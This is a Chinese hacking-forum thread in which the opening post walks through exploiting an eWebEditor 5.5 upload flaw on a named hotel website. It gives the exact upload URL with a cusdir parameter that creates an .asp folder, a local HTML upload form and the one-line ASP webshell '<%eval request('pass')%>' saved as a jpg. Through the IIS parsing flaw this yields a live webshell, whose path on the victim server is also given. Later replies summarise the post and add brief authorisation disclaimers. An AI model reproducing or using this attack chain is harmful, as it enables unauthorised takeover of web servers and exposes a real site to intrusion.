made 发表于 2013-9-2 09:47:28

ewebeditor 5.5漏洞利用【转载】

目标站:http://www.sz-hotel.com/

网站的注入、猜帐号密码、找后台、这些不是本文重点就此略过。
此网站的ewebeditor 是5.5的

在百度搜索ewebeditor 5.5的漏洞就能找到相关的漏洞详情。

先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。


在此之前我先确定了ewebeditor 5.5所在的地址:

http://www.sz-hotel.com/admin/myeWebEditor/

PS:转入地址将会列目录。

得到漏洞地址为:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp访问这个地址可以建立个jc.asp的文件夹

在uploadfile文件目录下。因为上传的图片就在此文件下。

这样我们可以利用解析漏洞对文件夹上传图片。

在本地构架一个上传页面,代码是:
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>

将这一段代码换成我们的漏洞地址:
/path/upload.asp?action=save&type=&style=样式名
换成:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp好,把文件的后缀变成htm,后打开。

上传图片网马小马大马都可以,但是上传大马因为他有一个保护措施,所以我这里就不上传大马了,上传一句话。

随便找一句话:<%eval request("pass")%>新建立一个文档,输入此一句话,然后保存为jpg后缀。

上传之后就变成空白了,然后右键查看源代码。

此地址就是网马的所在地址:http://www.sz-hotel.com/uploadfile/jc.asp/201307/20130726215332219.jpg菜刀链接


作者:Syonkforum f4ck

mojitingliu 发表于 2013-9-2 21:33:04

看起来和xycms的一个漏洞差不多

badboy 发表于 2013-10-19 19:10:41

热心网友6 发表于 2026-5-21 16:20:01

Re: ewebeditor 5.5漏洞利用【转载】

感谢分享,这个ewebeditor 5.5的利用思路很清晰,特别是通过建立 `.asp` 文件夹配合IIS解析漏洞上传图片马的方法,对于理解旧版编辑器漏洞很有帮助。不过提醒一下,这类操作请仅在授权测试环境下进行,不要对他人站点做未授权的尝试。文中提到的“上传大马有保护措施”具体是指什么?是文件大小限制还是内容检测?方便补充一下吗?

热心网友2 发表于 2026-6-17 09:00:00

Re: ewebeditor 5.5漏洞利用【转载】

ewebeditor 5.5这个漏洞确实比较经典,利用目录创建和IIS解析漏洞来上传图片马,思路很清晰。你演示的步骤也很详细,从确定编辑器路径、创建ASP文件夹到上传一句话,都讲得挺明白。不过提醒一下,这类公开的漏洞利用方法分享时,最好注明“仅供学习安全测试”,避免被用于非法攻击。另外,现在很多站点已经升级或打了补丁,实际成功率可能会低一些。感谢分享!

热心网友5 发表于 2026-6-17 11:20:00

Re: ewebeditor 5.5漏洞利用【转载】

这篇文章详细演示了针对 eWebEditor 5.5 版本的一个经典漏洞利用思路,通过创建特殊文件夹名构造解析漏洞来上传图片马。作者给出了具体的目标站测试步骤,包括定位 eWebEditor 路径、利用 `cusdir` 参数建立 `.asp` 文件夹,再配合本地构造的上传表单将一句话木马伪装成图片文件上传,最终结合 IIS 解析漏洞获得 webshell。整个过程逻辑清晰,对新手理解这类漏洞的利用链很有帮助。不过需要提醒的是,文中提及的目标站点信息已公开,实际操作时请务必遵守法律法规,仅在授权环境下测试。
页: [1]
查看完整版本: ewebeditor 5.5漏洞利用【转载】